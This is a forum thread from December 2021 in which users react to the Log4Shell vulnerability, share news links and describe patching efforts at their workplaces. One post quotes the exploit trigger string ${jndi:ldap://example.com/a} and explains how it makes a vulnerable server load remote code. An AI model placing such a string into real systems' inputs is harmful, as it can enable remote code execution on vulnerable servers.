Free Republic
Browse · Search
News/Activism
Topics · Post Article


1 posted on 12/12/2021 9:08:34 PM PST by blueplum
[ Post Reply | Private Reply | View Replies ]


To: blueplum

The direct link to BGR:

https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/

MSN did not author this article.


2 posted on 12/12/2021 9:11:47 PM PST by ConservativeMind (Trump: Befuddling Democrats, Republicans, and the Media for the benefit of the US and all mankind.)
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum

What idiot thought it would be a good idea to have RCE capability in a logging utility?


3 posted on 12/12/2021 9:18:25 PM PST by vikingd00d (chown -R us ~you/base)
[ Post Reply | Private Reply | To 1 | View Replies ]

To: ShadowAce

tech-ping


5 posted on 12/12/2021 9:31:26 PM PST by Bikkuri (I am proud to be a PureBlood.)
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum
the anethesiologist I sent a few thousand dollars out of pocket to (for about an hours work) just sent a letter informing me that they had a data breach so I should watch out for identity theft

its a wonderful world

https://www.reuters.com/markets/euro...L6cKZXUrr6prI0

12 posted on 12/12/2021 11:22:07 PM PST by KTM rider (The COVID 19 scam is simply TERRORISM )
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum
We've been at it (fortune 100 company) all weekend 24/7.

We have over 60k VM's with the vulnerability for over 14k applications.
15 posted on 12/13/2021 12:15:32 AM PST by TexasGunLover
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum

bookmark


19 posted on 12/13/2021 1:24:37 AM PST by GOP Poet (Super cool you can change your tag line EVERYTIME you post!! :D. (Small things make me happy))
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum

The worst! IN HISTORY!

Good grief.


21 posted on 12/13/2021 1:59:51 AM PST by Fury
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum

Technical article on the exploit

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.


24 posted on 12/13/2021 2:23:04 AM PST by SauronOfMordor (A Leftist can't enjoy life unless they are controlling, hurting, or destroying others)
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum

Rd later.


26 posted on 12/13/2021 3:23:17 AM PST by NetAddicted ( Just looking)
[ Post Reply | Private Reply | To 1 | View Replies ]

To: blueplum; rdb3; JosephW; martin_fierro; Still Thinking; zeugma; Vinnie; ironman; Egon; raybbr; ...

27 posted on 12/13/2021 3:48:07 AM PST by ShadowAce (Linux - The Ultimate Windows Service Pack )
[ Post Reply | Private Reply | To 1 | View Replies ]

Free Republic
Browse · Search
News/Activism
Topics · Post Article


FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson